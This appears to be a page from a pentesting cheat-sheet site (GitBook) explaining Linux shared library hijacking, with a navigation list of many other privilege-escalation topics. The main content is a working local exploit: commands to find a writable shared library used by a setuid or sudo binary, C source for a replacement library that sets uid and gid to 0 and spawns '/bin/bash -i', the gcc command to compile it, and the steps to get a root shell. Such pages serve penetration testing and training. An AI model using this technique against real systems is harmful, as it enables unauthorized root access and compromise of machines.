Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Shared Library Hijacking

PreviousSSSD Privilege EscalationNextSnapd Privilege Escalation

Last updated 1 year ago

When we find the binary file as setuid or sudo command, check the strings of the binary file.

strings ./example
strace ./example
gdb ./example

...
foo.so
...
Copied!

If the binary file uses a shared library (e.g. foo.so) and this library can be modified, we can update it and get a root shell.

find / -type f -name "foo.so" 2>/dev/null
ls -al /path/to/foo.so

drwxrwxrwx 1 user user 64 Dec 15 09:13 foo.so
Copied!

Create "foo.c".

#include <stdlib.h>
#include <unistd.h>

void foo() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}
Copied!

Then compile it to shared object.

gcc -shared -fPIC -nostartfiles -o foo.so foo.c
Copied!

Put the shared file to /path/to/foo.so . Now run the binary.

./example
# or
sudo ./example
Investigation
Exploitation
Page cover image